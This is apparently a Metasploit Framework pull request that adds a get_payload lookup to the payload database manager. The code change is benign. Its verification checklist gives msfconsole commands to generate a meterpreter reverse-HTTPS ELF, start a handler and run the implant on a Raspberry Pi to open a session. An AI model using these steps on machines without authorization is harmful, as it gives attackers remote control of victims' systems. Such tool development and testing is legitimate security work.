### PR TITLE
Add missing get_payload() method

### DIFF
--- a/lib/msf/core/db_manager/payload.rb
+++ b/lib/msf/core/db_manager/payload.rb
@@ -52,4 +52,13 @@ module Msf::DBManager::Payload
     end
   end
 
+  def get_payload(opts)
+    raise ArgumentError.new("The following options are required: :uuid") if opts[:uuid].nil?
+
+    ::ActiveRecord::Base.connection_pool.with_connection do
+      return Mdm::Payload.find_by(uuid: opts[:uuid])
+    end
+
+  end
+
 end


### PR DESCRIPTION
This change fixes the multi/meterpreter_reverse_https payload handler. It may fix others too. I didn't find an existing github issue.

## Verification

List the steps needed to make sure this thing works

- [ ] Create `/certs/certs.pem` according to Paranoid Mode:
```
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com" \
-keyout www.example.com.key \
-out www.example.com.crt
cat www.example.com.key www.example.com.crt > /certs/cert.pem
```
- [x] Start `msfconsole`
- [x] `setg LHOST wlan0` or your network interface name.
- [x] `setg LPORT 443`
- [x] `setg PayloadUUIDTracking true`
- [x] `setg HandlerSSLCert /certs/cert.pem`
- [x] `setg StagerVerifySSLCert true`
- [x] `setg IgnoreUnknownPayloads true`
- [x] `setg LURI /multi`
- [x] `use payload/linux/armle/meterpreter_reverse_https`
- [x] `set PayloadUUIDName ParanoidStagedElfArm`
- [x] `generate -f elf -o /tmp/rev`
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD multi/meterpreter/reverse_https`
- [x] `set ExitOnSession false`
- [x] `exploit -j`
- [x] Copy `/tmp/rev` over to your friendly neighborhood raspberry pi
- [x] Run `rev` on the pi.
- [x] **Verify** A new session is created.
- [x] **Verify** msfconsole doesn't bark about a missing get_payload function and suggest to use payloads instead.
